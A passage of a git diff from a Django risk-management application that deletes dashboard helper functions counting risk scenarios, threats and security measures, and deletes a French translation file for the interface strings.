analyses=analyses).items(): - residual_level.append({'name': r[0], 'value': r[1]['count'], 'color': r[1]['color']}) - - return {"current": current_level, "residual": residual_level} - - -def p_risks(user: User): - p_risks_labels = list() - p_risks_counts = list() - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, Threat) - for p_risk in Threat.objects.filter(id__in=object_ids_view).order_by('name'): - p_risks_labels.append(p_risk.name) - p_risks_counts.append( - RiskScenario.objects.filter(threat=p_risk).count()) - - return { - "indicators": p_risks_labels, - "values": p_risks_counts, - "min": min(p_risks_counts, default=0) - 1, - "max": max(p_risks_counts, default=0) + 1, - } - - -def p_risks_2(user: User): - data = list() - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, Threat) - for p_risk in Threat.objects.filter(id__in=object_ids_view).order_by('name'): - cnt = RiskScenario.objects.filter(threat=p_risk).count() - if cnt > 0: - data.append({"value": RiskScenario.objects.filter( - threat=p_risk).count(), "name": p_risk.name}) - return data - - -def risks_per_project_groups(user: User): - output = list() - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, RiskScenario) - for folder in Folder.objects.all().order_by('name'): - ri_level = RiskScenario.objects.filter(id__in=object_ids_view).filter(analysis__project__folder=folder).values( - 'current_level').annotate(total=Count('current_level')) - output.append({"folder": folder, "ri_level": ri_level}) - return output - - -def get_counters(user: User): - output = {} - objects_dict = {"RiskScenario": RiskScenario, - "SecurityMeasure": SecurityMeasure, - "Analysis": Analysis, - "Project": Project, - "Security Function": SecurityFunction, - "RiskAcceptance": RiskAcceptance, - "Threat": Threat} - for name, type in objects_dict.items(): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, type) - if type == RiskScenario: - output["ShowStopper"] = type.objects.filter( - id__in=object_ids_view).filter(treatment="blocker").count() - output[name] = type.objects.filter(id__in=object_ids_view).count() - - return output - - -def security_measure_priority(user: User): - def get_quadrant(security_measure): - for risk_scenario in security_measure.riskscenario_set.all(): - # TODO: get from matrix - if risk_scenario.current_level in ['M', 'H', 'VH']: - if security_measure.effort in ['S', 'M']: - return "1st" - elif security_measure.effort in ['L', 'XL']: - return "2nd" - else: - return "undefined" - else: - if security_measure.effort in ['S', 'M']: - return "3rd" - elif security_measure.effort in ['L', 'XL']: - return "4th" - else: - return "undefined" - return "undefined" - - clusters = {"1st": list(), "2nd": list(), "3rd": list(), - "4th": list(), "undefined": list()} - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, SecurityMeasure) - - for mtg in SecurityMeasure.objects.filter(id__in=object_ids_view): - clusters[get_quadrant(mtg)].append(mtg) - - return clusters - - -def risk_status(user: User, analysis_list): - risk_color_map = get_risk_color_map(user) - names = list() - risk_abbreviations: list = get_risk_field(user, 'abbreviation') - current_out = {abbr: list() for abbr in risk_abbreviations} - residual_out = {abbr: list() for abbr in risk_abbreviations} - - rsk_status_out = {'open': list(), 'mitigated': list( - ), 'accepted': list(), 'blocker': list(), 'transferred': list()} - mtg_status_out = {'open': list(), 'in_progress': list(), - 'on_hold': list(), 'done': list()} - - max_tmp = list() - abbreviations = [x[0] for x in get_rating_options_abbr(user)] - for analysis in analysis_list: - - for lvl in get_rating_options(user): - abbr = abbreviations[lvl[0]] - cnt = RiskScenario.objects.filter( - analysis=analysis, current_level=lvl[0]).count() - current_out[abbr].append( - {'value': cnt, 'itemStyle': {'color': risk_color_map[abbr]}}) - - cnt = RiskScenario.objects.filter( - analysis=analysis, residual_level=lvl[0]).count() - residual_out[abbr].append( - {'value': cnt, 'itemStyle': {'color': risk_color_map[abbr]}}) - - max_tmp.append(RiskScenario.objects.filter( - analysis=analysis).count()) - - for option in RiskScenario.TREATMENT_OPTIONS: - cnt = RiskScenario.objects.filter( - analysis=analysis, treatment=option[0]).count() - rsk_status_out[option[0]].append( - {'value': cnt, 'itemStyle': {'color': STATUS_COLOR_MAP[option[0]]}}) - - for status in SecurityMeasure.MITIGATION_STATUS: - cnt = SecurityMeasure.objects.filter( - riskscenario__analysis=analysis, status=status[0]).count() - mtg_status_out[status[0]].append( - {'value': cnt, 'itemStyle': {'color': STATUS_COLOR_MAP[status[0]]}}) - - names.append(str(analysis.project) + ' ' + str(analysis.version)) - - y_max_rsk = max(max_tmp, default=0) + 1 - print("y_max_rsk: ", y_max_rsk) - - return { - 'names': names, - 'current_out': current_out, - 'residual_out': residual_out, - 'rsk_status_out': rsk_status_out, - 'mtg_status_out': mtg_status_out, - "y_max_rsk": y_max_rsk - } - - -def risks_levels_per_prj_grp(user: User): - risk_color_map = get_risk_color_map(user) - names = list() - risk_abbreviations: list = get_risk_field(user, 'abbreviation') - current_out = {abbr: list() for abbr in risk_abbreviations} - residual_out = {abbr: list() for abbr in risk_abbreviations} - - max_tmp = list() - - abbreviations = [x[0] for x in get_rating_options_abbr(user)] - for folder in Folder.objects.all(): - - for lvl in get_rating_options(user): - abbr = abbreviations[lvl[0]] - cnt = RiskScenario.objects.filter(id__in=object_ids_view).filter( - analysis__project__folder=folder, current_level=lvl[0]).count() - current_out[abbr].append( - {'value': cnt, 'itemStyle': {'color': risk_color_map[abbr]}}) - - cnt = RiskScenario.objects.filter(id__in=object_ids_view).filter( - analysis__project__folder=folder, residual_level=lvl[0]).count() - residual_out[abbr].append( - {'value': cnt, 'itemStyle': {'color': risk_color_map[abbr]}}) - - max_tmp.append(RiskScenario.objects.filter(id__in=object_ids_view).filter( - analysis__project__folder=folder).count()) - - names.append(str(folder)) - - y_max_rsk = max(max_tmp, default=0) + 1 - - return { - 'names': names, - 'current_out': current_out, - 'residual_out': residual_out, - "y_max_rsk": y_max_rsk - } - - -def measures_to_review(user: User): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, SecurityMeasure) - measures = SecurityMeasure.objects.filter(id__in=object_ids_view).filter( - eta__lte=date.today()+timedelta(days=30) - ).exclude(status__iexact='done' - ).order_by('eta') - - return measures - - -def acceptances_to_review(user: User): - (object_ids_view, object_ids_change, object_ids_delete) = RoleAssignment.get_accessible_object_ids( - Folder.get_root_folder(), user, RiskAcceptance) - acceptances = RiskAcceptance.objects.filter(id__in=object_ids_view).filter( - expiry_date__lte=date.today()+timedelta(days=30) - ).order_by('expiry_date') - acceptances |= RiskAcceptance.objects.filter(id__in=object_ids_view).filter( - validator=user).filter(state='submitted') - - return acceptances diff --git a/core/locale/fr/LC_MESSAGES/django.po b/core/locale/fr/LC_MESSAGES/django.po deleted file mode 100644 index e6907ac..0000000 --- a/core/locale/fr/LC_MESSAGES/django.po +++ /dev/null @@ -1,3686 +0,0 @@ -# SOME DESCRIPTIVE TITLE. -# Copyright (C) YEAR THE PACKAGE'S COPYRIGHT HOLDER -# This file is distributed under the same license as the PACKAGE package. -# FIRST AUTHOR , YEAR. -# -#, fuzzy -msgid "" -msgstr "" -"Project-Id-Version: PACKAGE VERSION\n" -"Report-Msgid-Bugs-To: \n" -"POT-Creation-Date: 2023-09-07 12:15+0000\n" -"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n" -"Last-Translator: FULL NAME \n" -"Language-Team: LANGUAGE \n" -"Language: \n" -"MIME-Version: 1.0\n" -"Content-Type: text/plain; charset=UTF-8\n" -"Content-Transfer-Encoding: 8bit\n" -"Plural-Forms: nplurals=2; plural=(n > 1);\n" - -#: core/admin_config.py:6 -msgid "Editor" -msgstr "Éditeur" - -#: core/admin_config.py:7 -msgid "Menu" -msgstr "" - -#: core/apps.py:244 -msgid "Core" -msgstr "Coeur" - -#: core/base_models.py:9 core/templates/core/asset_list.html:46 -#: core/templates/core/browser.html:22 core/templates/core/browser.html:46 -#: core/templates/core/ri_list.html:111 core/templates/core/ri_update.html:73 -#: core/templates/core/risk_matrix_list.html:50 -#: core/templates/core/risk_matrix_update.html:13 -#: core/templates/core/security_function_list.html:107 -#: core/templates/library/library_detail.html:33 -#: core/templates/snippets/mp_data.html:58 -#: core/templates/snippets/project_list_nested.html:7 -#: core/templates/snippets/ri_list_nested.html:10 -msgid "Name" -msgstr "Nom" - -#: core/base_models.py:10 core/templates/core/asset_list.html:47 -#: core/templates/core/project_create.html:36 -#: core/templates/core/project_domain_list.html:44 -#: core/templates/core/project_list.html:110 -#: core/templates/core/project_update.html:37 -#: core/templates/core/ri_update.html:78 -#: core/templates/core/risk_matrix_list.html:51 -#: core/templates/library/library_detail.html:34 -#: core/templates/library/library_detail.html:42 -#: core/templates/library/library_detail.html:57 -#: core/templates/library/library_list.html:20 -#: core/templates/snippets/mp_data.html:59 -#: core/templates/snippets/project_list_nested.html:10 -#: core/templates/snippets/ra_data.html:31 -msgid "Description" -msgstr "" - -#: core/base_models.py:11 core/filters.py:474 core/models.py:324 -msgid "Created at" -msgstr "Créé le" - -#: core/base_models.py:79 -msgid "This name is already in use." -msgstr "Ce nom est déjà utilisé." - -#: core/filters.py:21 core/filters.py:22 -msgid "Order by" -msgstr "Trier par" - -#: core/filters.py:100 core/templates/core/analysis_list.html:128 -#: core/templates/core/index.html:54 -#: core/templates/snippets/ra_list_nested.html:28 -msgid "draft" -msgstr "brouillon" - -#: core/filters.py:101 -msgid "Draft (descending)" -msgstr "Brouillon (descendant)" - -#: core/filters.py:102 core/templates/core/quick_start.html:107 -msgid "project" -msgstr "projet" - -#: core/filters.py:103 core/filters.py:168 -msgid "Project (descending)" -msgstr "Projet (descendant)" - -#: core/filters.py:104 -msgid "auditor" -msgstr "auditeur" - -#: core/filters.py:105 -msgid "Auditor (descending)" -msgstr "Auditeur (descendant)" - -#: core/filters.py:106 -msgid "updated at" -msgstr "mis à jour le" - -#: core/filters.py:107 -msgid "Updated at (descending)" -msgstr "Mis à jour le (descendant)" - -#: core/filters.py:112 core/filters.py:438 -#: core/templates/snippets/modal/modal_action_form.html:20 -#: core/templates/snippets/modal/modal_delete_form.html:21 -#: core/templates/snippets/modal/modal_import_library_form.html:19 -msgid "Yes" -msgstr "Oui" - -#: core/filters.py:113 core/filters.py:439 -msgid "No" -msgstr "Non" - -#: core/filters.py:119 -msgid "Search analysis..." -msgstr "Rechercher une analyse..." - -#: core/filters.py:131 core/filters.py:151 core/filters.py:208 -#: core/filters.py:248 core/filters.py:334 core/forms.py:407 core/forms.py:418 -#: core/models.py:33 core/models.py:305 core/models.py:500 -#: core/templates/core/acceptance_list.html:111 -#: core/templates/core/browser.html:47 -#: core/templates/core/fragments/watchlist_exceptions.html:11 -#: core/templates/core/fragments/watchlist_measures.html:11 -#: core/templates/core/mtg_list.html:110 -#: core/templates/core/project_create.html:26 -#: core/templates/core/project_domain_list.html:43 -#: core/templates/core/project_list.html:109 -#: core/templates/core/project_update.html:27 -#: core/templates/core/treatment.html:30 core/templates/snippets/mp_data.html:5 -msgid "Domain" -msgstr "Domaine" - -#: core/filters.py:144 -msgid "Search scenario..." -msgstr "Rechercher un scénario..." - -#: core/filters.py:149 core/filters.py:167 core/models.py:38 core/models.py:161 -#: core/models.py:428 core/templates/core/browser.html:21 -#: core/templates/core/quick_start.html:99 core/templates/core/ri_list.html:113 -#: core/templates/core/ri_update.html:23 core/templates/snippets/mp_data.html:7 -msgid "Project" -msgstr "Projet" - -#: core/filters.py:163 core/filters.py:204 core/filters.py:240 -#: core/filters.py:277 core/filters.py:302 core/filters.py:330 -#: core/filters.py:361 core/filters.py:391 core/filters.py:415 -#: core/filters.py:498 -msgid "name" -msgstr "nom" - -#: core/filters.py:164 core/filters.py:205 core/filters.py:241 -#: core/filters.py:278 core/filters.py:303 core/filters.py:331 -#: core/filters.py:362 core/filters.py:392 core/filters.py:416 -#: core/filters.py:499 -msgid "Name (descending)" -msgstr "Nom (descendant)" - -#: core/filters.py:165 -msgid "threat" -msgstr "menace" - -#: core/filters.py:166 -msgid "Threat (descending)" -msgstr "Menace (descendant)" - -#: core/filters.py:169 -msgid "treatment" -msgstr "traitement" - -#: core/filters.py:170 -msgid "Treatment (descending)" -msgstr "Traitement (descendant)" - -#: core/filters.py:183 -msgid "Search security measure..." -msgstr "Rechercher une mesure de sécurité..." - -#: core/filters.py:202 core/filters.py:332 -msgid "status" -msgstr "statut" - -#: core/filters.py:203 core/filters.py:333 -msgid "Status (descending)" -msgstr "Statut (descendant)" - -#: core/filters.py:206 core/models.py:75 -msgid "type" -msgstr "" - -#: core/filters.py:207 -msgid "Type (descending)" -msgstr "Type (descendant)" - -#: core/filters.py:209 core/filters.py:249 core/filters.py:335 -msgid "Domain (descending)" -msgstr "Domaine (descendant)" - -#: core/filters.py:210 -msgid "security function" -msgstr "fonction de sécurité" - -#: core/filters.py:211 -msgid "Security function (descending)" -msgstr "Fonction de sécurité (descendant)" - -#: core/filters.py:225 -msgid "Search acceptance..." -msgstr "Rechercher une acceptation..." - -#: core/filters.py:242 core/templates/core/quick_start.html:130 -#: core/views.py:553 -msgid "risk scenarios" -msgstr "scénarios de risque" - -#: core/filters.py:243 -msgid "Risk scenarios (descending)" -msgstr "Scénarios de risque (descendant)" - -#: core/filters.py:244 -msgid "expiry" -msgstr "expiration" - -#: core/filters.py:245 -msgid "Expiry date (descending)" -msgstr "Date d'expiration (descendant)" - -#: core/filters.py:246 -msgid "validator" -msgstr "validateur" - -#: core/filters.py:247 -msgid "Validator (descending)" -msgstr "Validateur (descendant)" - -#: core/filters.py:268 -msgid "Search domain..." -msgstr "Rechercher un domaine..." - -#: core/filters.py:279 core/filters.py:304 -msgid "description" -msgstr "" - -#: core/filters.py:280 core/filters.py:305 -msgid "Description (descending)" -msgstr "Description (descendant)" - -#: core/filters.py:293 -msgid "Search matrices..." -msgstr "Rechercher des matrices..." - -#: core/filters.py:318 -msgid "Search project..." -msgstr "Rechercher un projet..." - -#: core/filters.py:351 -msgid "Search threat..." -msgstr "Rechercher une menace..." - -#: core/filters.py:354 -msgid "None" -msgstr "" - -#: core/filters.py:363 core/filters.py:393 -msgid "provider" -msgstr "fournisseur" - -#: core/filters.py:364 core/filters.py:394 -msgid "Provider (descending)" -msgstr "Fournisseur (descendant)" - -#: core/filters.py:380 -msgid "Search function..." -msgstr "Rechercher une fonction..." - -#: core/filters.py:407 -msgid "Search asset..." -msgstr "Rechercher un bien sensible..." - -#: core/filters.py:457 -msgid "Search user..." -msgstr "Rechercher un utilisateur..." - -#: core/filters.py:468 core/forms.py:98 core/forms.py:126 -#: core/templates/snippets/associated_users_list_nested.html:13 -#: core/templates/snippets/users_list_nested.html:13 core/views.py:1795 -msgid "Email" -msgstr "Adresse électronique" - -#: core/filters.py:469 -msgid "Email (descending)" -msgstr "Adresse électronique (descendant)" - -#: core/filters.py:470 core/views.py:1795 -msgid "First name" -msgstr "Prénom" - -#: core/filters.py:471 -msgid "First name (descending)" -msgstr "Prénom (descendant)" - -#: core/filters.py:472 core/views.py:1795 -msgid "Last name" -msgstr "Nom" - -#: core/filters.py:473 -msgid "Last name (descending)" -msgstr "Nom (descendant)" - -#: core/filters.py:475 -msgid "Created at (descending)" -msgstr "Créé le (descendant)" - -#: core/filters.py:489 -msgid "Search user group..." -msgstr "Rechercher un groupe utilisateur..." - -#: core/forms.py:32 -msgid "Invalid link" -msgstr "" - -#: core/forms.py:99 -msgid "Password" -msgstr "Mot de passe" - -#: core/forms.py:147 -msgid "terms and conditions of use" -msgstr "conditions générales d'utilisation" - -#: core/forms.py:371 core/models.py:419 -msgid "Risk scenario" -msgstr "Scénario de risque" - -#: core/forms.py:384 -msgid "This validator cannot be assigned for this domain" -msgstr "Ce validateur ne peut pas être assigné à ce domaine" - -#: core/forms.py:388 -msgid "Checked risk scenarios must be part of the selected domain" -msgstr "" -"Les scénarios de risque sélectionnés doivent faire partie du domaine " -"sélectionné" - -#: core/forms.py:460 -msgid "A primary asset cannot have parent assets." -msgstr "Un bien primaire ne peut pas avoir de bien parent." - -#: core/forms.py:465 -msgid "Cycles are not allowed." -msgstr "Les cycles ne sont pas autorisés" - -#: core/models.py:22 -msgid "--" -msgstr "" - -#: core/models.py:23 -msgid "Design" -msgstr "Conception" - -#: core/models.py:24 -msgid "Development" -msgstr "Développement" - -#: core/models.py:25 -msgid "Production" -msgstr "" - -#: core/models.py:26 -msgid "End Of Life" -msgstr "Fin de vie" - -#: core/models.py:27 -msgid "Dropped" -msgstr "Abandonné" - -#: core/models.py:31 -msgid "Internal reference" -msgstr "Référence interne" - -#: core/models.py:35 core/models.py:311 core/templates/core/browser.html:50 -#: core/templates/core/fragments/watchlist_measures.html:14 -#: core/templates/core/project_create.html:31 -#: core/templates/core/project_update.html:32 -#: core/templates/core/ri_update.html:50 core/templates/core/treatment.html:33 -#: core/templates/snippets/mp_data.html:65 -#: core/templates/snippets/mtg_list_nested.html:16 -#: core/templates/snippets/project_list_nested.html:13 -#: core/templates/snippets/ri_list_nested.html:25 -msgid "Status" -msgstr "Statut" - -#: core/models.py:39 core/templates/core/mtg_list.html:115 -#: core/templates/core/project_list.html:6 -#: core/templates/core/risk_matrix_list.html:52 -#: core/templates/core/sidebar.html:147 core/views.py:272 core/views.py:919 -msgid "Projects" -msgstr "Projets" - -#: core/models.py:48 core/models.py:109 -#: core/templates/core/security_function_list.html:108 -#: core/templates/core/threat_list.html:110 -#: core/templates/library/library_detail.html:43 -#: core/templates/library/library_detail.html:58 -msgid "Provider" -msgstr "Fournisseur" - -#: core/models.py:50 core/models.py:78 core/models.py:110 -msgid "published" -msgstr "publié" - -#: core/models.py:53 core/models.py:388 core/templates/core/ri_create.html:31 -#: core/templates/core/ri_list.html:112 core/templates/core/ri_update.html:68 -#: core/templates/core/threat_list.html:109 -#: core/templates/snippets/ri_list_nested.html:13 -msgid "Threat" -msgstr "Menace" - -#: core/models.py:54 core/templates/core/sidebar.html:165 -#: core/templates/core/threat_list.html:5 core/views.py:1646 -msgid "Threats" -msgstr "Menaces" - -#: core/models.py:69 -msgid "Primary" -msgstr "Primaire" - -#: core/models.py:70 core/templates/license/overview.html:54 -msgid "Support" -msgstr "Support" - -#: core/models.py:73 -msgid "business value" -msgstr "valeur métier" - -#: core/models.py:77 -msgid "parent assets" -msgstr "biens parents" - -#: core/models.py:81 core/models.py:384 core/templates/core/asset_list.html:7 -#: core/templates/core/quick_start.html:76 core/templates/core/sidebar.html:156 -#: core/views.py:1021 -msgid "Assets" -msgstr "Biens sensibles" - -#: core/models.py:82 -msgid "Asset" -msgstr "Bien sensible" - -#: core/models.py:113 core/templates/core/mtg_list.html:113 -#: core/templates/snippets/mp_data.html:61 -#: core/templates/snippets/mtg_list_nested.html:13 -msgid "Security function" -msgstr "Fonction de sécurité" - -#: core/models.py:114 core/templates/core/security_function_list.html:5 -#: core/templates/core/sidebar.html:173 core/views.py:804 core/views.py:1568 -msgid "Security functions" -msgstr "Fonctions de sécurité" - -#: core/models.py:121 -msgid "JSON definition" -msgstr "Définition au format JSON" - -#: core/models.py:121 -msgid "" -"JSON definition of the matrix. See the documentation for more " -"information." -msgstr "" -"Définition au format JSON de la matrice. Voir la documentation pour " -"plus d'informations." - -#: core/models.py:123 -msgid "enabled" -msgstr "activé" - -#: core/models.py:124 -msgid "" -"If the matrix is set as disabled, it will not be available for selection for " -"new risk analyses." -msgstr "" -"Si la matrice est désactivée, elle ne sera pas disponible à la sélection " -"dans une nouvelles analyse de risque." - -#: core/models.py:163 core/templates/core/ri_update.html:43 -msgid "Version" -msgstr "" - -#: core/models.py:165 core/templates/core/analysis_list.html:116 -#: core/templates/core/ri_create.html:21 core/templates/core/ri_update.html:35 -#: core/templates/snippets/ra_list_nested.html:10 core/utils.py:31 -#: core/utils.py:36 core/utils.py:41 -msgid "Auditor" -msgstr "Auditeur" - -#: core/models.py:166 -msgid "is a draft" -msgstr "brouillon" - -#: core/models.py:168 -msgid "WARNING! After choosing it, you will not be able to change it" -msgstr "ATTENTION! Après l'avoir choisie, vous ne pourrez plus la modifier" - -#: core/models.py:168 core/templates/core/analysis_list.html:118 -#: core/templates/core/quick_start.html:16 -#: core/templates/core/ra_update.html:19 -#: core/templates/snippets/ra_list_nested.html:16 -msgid "Rating matrix" -msgstr "Matrice d'évaluation" - -#: core/models.py:174 core/models.py:382 core/templates/core/ri_create.html:17 -#: core/templates/core/ri_update.html:27 core/templates/snippets/mp_data.html:9 -msgid "Analysis" -msgstr "Analyse" - -#: core/models.py:175 core/templates/core/mtg_list.html:114 -#: core/templates/core/overview.html:43 core/views.py:1247 -msgid "Analyses" -msgstr "Analyses" - -#: core/models.py:196 -msgid "{}: Risk analysis is still in Draft mode" -msgstr "{} : Analyse de risque toujours en mode Brouillon" - -#: core/models.py:199 -msgid "{}: No auditor assigned to this risk analysis yet" -msgstr "{} : Pas d'auditeur assigné à cette analyse de risque" - -#: core/models.py:202 -msgid "{}: Analysis is empty. No risk scenario declared yet" -msgstr "{} : Analyse vide. Pas de scénario de risque déclaré." - -#: core/models.py:210 -msgid "{} current risk level has not been assessed" -msgstr "{} le niveau du risque courant n'a pas été évalué" - -#: core/models.py:213 -msgid "" -"{} residual risk level has not been assessed. If no additional measures are " -"applied, it should be at the same level as the current risk" -msgstr "" -"{} le niveau du risque residuel n'a pas été évalué. Si aucune mesure " -"suplémentaire n'est appliquée, il doit être au même niveau que le risque " -"courant" - -#: core/models.py:216 -msgid "{} residual risk level is higher than the current one" -msgstr "{} niveau du risque résiduel plus élevé que le niveau initial" - -#: core/models.py:219 -msgid "{} residual risk probability is higher than the current one" -msgstr "" -"{} probabilité de risque résiduelle plus élevée que la probabilité courante" - -#: core/models.py:222 -msgid "{} residual risk impact is higher than the current one" -msgstr "{} impact du risque résiduel plus haut que l'impact courant" - -#: core/models.py:228 -msgid "{}: residual risk level has been lowered without any specific measure" -msgstr "{} : le niveau de risque résiduel a été réduit sans mesure spécifique" - -#: core/models.py:232 -msgid "{} risk accepted but no risk acceptance attached" -msgstr "{} risque accepté sans acceptation de risque attachée" - -#: core/models.py:239 -msgid "{}/{} does not have an ETA" -msgstr "{}/{} n'a pas d'heure d'arrivée estimée" - -#: core/models.py:244 -msgid "{}/{} ETA is in the past now. Consider updating its status or the date" -msgstr "{}/{} ETA dépassé. Envisaager de mettre à jour son statut ou son ETA" - -#: core/models.py:247 -msgid "" -"{}/{} does not have an estimated effort. This will help you for " -"prioritization" -msgstr "" -"{}/{} n'a pas d'effort estimé. Spécifier un effort estimé aidera à la " -"priorisation des mesures de sécurité" - -#: core/models.py:250 -msgid "" -"{}/{}: Security measure does not have an external link attached. This will " -"help you for follow-up" -msgstr "" -"{}/{} ne comporte pas de lien externe. Spécifier un lien externe aidera au " -"suivi du traitement" - -#: core/models.py:255 -msgid "{}/{}: Acceptance has no expiry date" -msgstr "{}/{]} : Acceptation sans date d'expiration" - -#: core/models.py:260 -msgid "{}/{}: Acceptance has expired. Consider updating the status or the date" -msgstr "" -"{}/{} a une acceptation de risque expirée. Envisager de mettre à jour son " -"statut ou sa date d'expiration" - -#: core/models.py:282 core/models.py:374 -msgid "Open" -msgstr "Ouvert" - -#: core/models.py:283 -msgid "In progress" -msgstr "En cours" - -#: core/models.py:284 -msgid "On hold" -msgstr "En attente" - -#: core/models.py:285 -msgid "Done" -msgstr "Terminé" - -#: core/models.py:289 -msgid "N/A" -msgstr "" - -#: core/models.py:290 -msgid "Technical" -msgstr "Technique" - -#: core/models.py:291 -msgid "Organizational" -msgstr "Organisationnel" - -#: core/models.py:295 -msgid "Small" -msgstr "Faible" - -#: core/models.py:296 core/tests/test_helpers.py:67 -#: core/tests/test_helpers.py:123 -msgid "Medium" -msgstr "Moyen" - -#: core/models.py:297 -msgid "Large" -msgstr "Important" - -#: core/models.py:298 -msgid "Extra-Large" -msgstr "Très Important" - -#: core/models.py:307 -msgid "Security Function" -msgstr "Fonction de sécurité" - -#: core/models.py:309 core/templates/core/asset_list.html:49 -#: core/templates/core/mtg_list.html:111 -#: core/templates/snippets/mp_data.html:60 -msgid "Type" -msgstr "" - -#: core/models.py:313 -msgid "Estimated Time of Arrival" -msgstr "Heure d'arrivée prévue" - -#: core/models.py:313 core/templates/core/browser.html:48 -#: core/templates/core/fragments/watchlist_measures.html:17 -#: core/templates/core/mtg_list.html:112 core/templates/core/treatment.html:34 -#: core/templates/snippets/mp_data.html:62 -msgid "ETA" -msgstr "Arrivée estimée" - -#: core/models.py:316 -msgid "External url for action follow-up (eg. Jira ticket)" -msgstr "URL externe pour le suivi des mesures correctives (ex : ticket Jira)" - -#: core/models.py:317 core/templates/snippets/mp_data.html:64 -msgid "Link" -msgstr "Lien" - -#: core/models.py:320 -msgid "Relative effort of the measure (using T-Shirt sizing)" -msgstr "Effort relatif impliqué par la mesure" - -#: core/models.py:321 core/templates/snippets/mp_data.html:63 -msgid "Effort" -msgstr "" - -#: core/models.py:326 core/models.py:414 core/models.py:506 -msgid "Updated at" -msgstr "Mis à jour le" - -#: core/models.py:329 -msgid "Security measure" -msgstr "Mesure de sécurité" - -#: core/models.py:330 core/models.py:386 core/templates/core/mtg_list.html:6 -#: core/templates/core/overview.html:51 core/templates/core/sidebar.html:115 -#: core/views.py:1490 -msgid "Security measures" -msgstr "Mesures de sécurité" - -#: core/models.py:375 -msgid "Mitigated" -msgstr "Atténué" - -# Toléré ? -#: core/models.py:376 core/models.py:495 -msgid "Accepted" -msgstr "Accepté" - -#: core/models.py:377 -msgid "Show-stopper" -msgstr "Bloquant" - -#: core/models.py:378 -msgid "Transferred" -msgstr "Transféré" - -#: core/models.py:384 -msgid "Assets impacted by the risk scenario" -msgstr "Biens sensibles impactés par le scénario de risque" - -#: core/models.py:391 -msgid "" -"The existing security measures to manage this risk. Edit the risk scenario " -"to add extra security measures." -msgstr "" -"Les mesures de sécurité existantes pour gérer ce risque. Modifiez le " -"scénario de risque pour y ajouter des mesures de sécurité supplémentaires." - -#: core/models.py:392 core/templates/core/ri_create.html:76 -#: core/templates/core/ri_update.html:104 -#: core/templates/snippets/mp_data.html:48 -#: core/templates/snippets/ri_list_nested.html:16 -msgid "Existing measures" -msgstr "Mesures existantes" - -#: core/models.py:396 core/templates/core/ri_create.html:83 -#: core/templates/core/ri_update.html:114 -msgid "Current probability" -msgstr "Probabilité courante" - -#: core/models.py:398 core/templates/core/ri_create.html:88 -#: core/templates/core/ri_update.html:122 -msgid "Current impact" -msgstr "Impact courant" - -#: core/models.py:399 core/templates/core/browser.html:23 -msgid "Current level" -msgstr "Niveau de risque courant" - -#: core/models.py:400 -msgid "" -"The risk level given the current measures. Automatically updated on Save, " -"based on the chosen matrix" -msgstr "" -"Le niveau de risque compte tenu des mesures actuelles. Mis à jour " -"automatiquement lors de l'enregistrement. Basé sur la matrice d'évaluation " -"choisie." - -#: core/models.py:404 core/templates/core/ri_create.html:47 -#: core/templates/core/ri_update.html:163 -msgid "Residual probability" -msgstr "Probabilité résiduelle" - -#: core/models.py:406 core/templates/core/ri_create.html:52 -#: core/templates/core/ri_update.html:171 -msgid "Residual impact" -msgstr "Impact résiduel" - -#: core/models.py:407 core/templates/core/browser.html:24 -msgid "Residual level" -msgstr "Niveau de risque résiduel" - -#: core/models.py:408 -msgid "" -"The risk level when all the extra measures are done. Automatically updated " -"on Save, based on the chosen matrix" -msgstr "" -"Le niveau de risque une fois les mesuress supplémentaires appliquées. Mis à " -"jour automatiquement lors de l'enregistrement. Basé sur la matrice " -"d'évaluation choisie." - -#: core/models.py:411 core/templates/core/browser.html:25 -#: core/templates/core/ri_create.html:61 core/templates/core/ri_update.html:57 -msgid "Treatment status" -msgstr "Statut du traitement" - -#: core/models.py:416 core/models.py:510 core/templates/core/ri_create.html:66 -#: core/templates/core/ri_update.html:148 -msgid "Comments" -msgstr "Commentaires" - -#: core/models.py:420 core/models.py:501 -#: core/templates/core/analysis_list.html:117 -#: core/templates/core/ri_list.html:7 core/templates/core/sidebar.html:106 -#: core/templates/snippets/ra_data.html:39 -#: core/templates/snippets/ra_list_nested.html:13 core/views.py:1372 -msgid "Risk scenarios" -msgstr "Scénarios de risque" - -#: core/models.py:470 -msgid "/" -msgstr "" - -#: core/models.py:470 -msgid ": " -msgstr "" - -#: core/models.py:493 -msgid "Created" -msgstr "Créée" - -#: core/models.py:494 -msgid "Submitted" -msgstr "Soumise" - -#: core/models.py:496 -msgid "Rejected" -msgstr "Rejetée" - -#: core/models.py:497 -msgid "Revoked" -msgstr "Révoquée" - -#: core/models.py:501 -msgid "" -"Select the risk scenarios to be accepted, attention they must be part of the " -"chosen domain" -msgstr "" -"Sélectionner les scénarios de risque à accepter, attention ils doivent faire " -"partis du domaine choisi" - -#: core/models.py:502 -msgid "Risk owner and validator identity" -msgstr "Identité du propriétaire et validateur du risque" - -#: core/models.py:502 core/templates/core/acceptance_list.html:112 -#: core/templates/core/fragments/watchlist_exceptions.html:14 core/utils.py:30 -#: core/utils.py:37 core/utils.py:40 -msgid "Validator" -msgstr "Validateur" - -#: core/models.py:503 -msgid "State" -msgstr "État" - -#: core/models.py:504 -msgid "Specify when the risk acceptance will no longer apply" -msgstr "Spécifier quand l'acceptation de risque ne sera plus applicable" - -#: core/models.py:505 -#: core/templates/core/fragments/watchlist_exceptions.html:17 -msgid "Expiry date" -msgstr "Date d'expiration" - -#: core/models.py:507 -msgid "Acceptance date" -msgstr "Date d'acceptation" - -#: core/models.py:508 -msgid "Rejection date" -msgstr "Date de rejet" - -#: core/models.py:509 -msgid "Revocation date" -msgstr "Date de révocation" - -#: core/models.py:514 core/templates/core/acceptance_list.html:110 -msgid "Risk acceptance" -msgstr "Acceptation de risque" - -#: core/models.py:515 core/templates/core/acceptance_list.html:6 -#: core/templates/core/overview.html:55 core/templates/core/sidebar.html:124 -#: 